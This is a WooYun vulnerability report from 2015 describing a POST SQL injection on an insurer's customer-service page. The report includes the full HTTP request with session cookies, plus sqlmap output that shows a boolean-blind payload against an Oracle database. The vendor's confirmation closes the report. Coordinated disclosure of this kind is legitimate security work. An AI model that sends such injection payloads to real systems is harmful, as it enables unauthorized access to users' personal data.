当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115379

漏洞标题:泰康人寿post注入全站用户信息泄露

相关厂商:taikang.com

漏洞作者: Me_Fortune

提交时间:2015-05-21 17:56

修复时间:2015-07-06 09:54

公开时间:2015-07-06 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-06-01: 细节向核心白帽子及相关领域专家公开
2015-06-11: 细节向普通白帽子公开
2015-06-21: 细节向实习白帽子公开
2015-07-06: 细节向公众公开

简要描述:

如题

详细说明:

1、

POST /eservice/comment/showUserComments.jsp HTTP/1.1
Host: ecs.taikang.com
Proxy-Connection: keep-alive
Content-Length: 95
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ecs.taikang.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.0.595.32 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ecs.taikang.com/eservice/comment/showUserComments.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: BIGipServerpool_128=2768439050.30755.0000; tkmssid=d001f59c-93b4-4a9c-afad-7b6f37495faa; tkmtoken=73455fcf82793244562cdaed9ffb4e5f; pgv_pvi=3802278912; pgv_si=s7317284864; _pzfxuvpc=1432194814721%7C1385191079499157093%7C1%7C1432194814727%7C1%7C%7C1310137810426910490; _pzfxsvpc=1310137810426910490%7C1432194814721%7C1%7C; _pzfxsfc=; 4000095522mid=686_86; 4000095522slid=slid_746_32%7C; 4000095522is=2; 4000095522mh=1432195160687; tkmid=8110342; tkmname=bush; JSESSIONID=0000QIdhEdR8DHYgMN-DuTiY9kq:-1; SESS[MEMBER]=0f251966b09a09b4c81560df38d3abcd; loginName=bush; UNAME=bush; UNAME1=8110342; MLV=1; CUR=CNY; LANG=CN; S[MEMBERID]=8110342; _gscu_1984844848=32195257me0rcr20; _gscs_1984844848=321952579lj5e520|pv:13; _gscbrs_1984844848=1; _smt_uid=555d90b9.4efa8d45; Hm_lvt_b7f4a12c6b299f2870e826ec7b955f9a=1432119017,1432194815; Hm_lpvt_b7f4a12c6b299f2870e826ec7b955f9a=1432195406; OZ_1U_2132=vid=v55d91141ff81a.0&ctime=1432195409&ltime=1432195405
productvalue=&statusvalue=&begintime=2015-05-21&endtime=2015-05-21&status=&title=12345&product=


2、

sqlmap identified the following injection points with a total of 1291 HTTP(s) requests:
---
Parameter: status (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: productvalue=&statusvalue=&begintime=2015-05-21&endtime=2015-05-21&status=-2873 OR 9504=9504&title=12345&product=
---
back-end DBMS: Oracle


3、

1.png


4、

2.png


5、

3.png


6、就不深入了,确定不是测试数据库。

漏洞证明:

修复方案:

版权声明:转载请注明来源 Me_Fortune@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-05-22 09:53

厂商回复:

泰康人寿感谢您发现并提交给我们,已安排人员处理!

最新状态:

暂无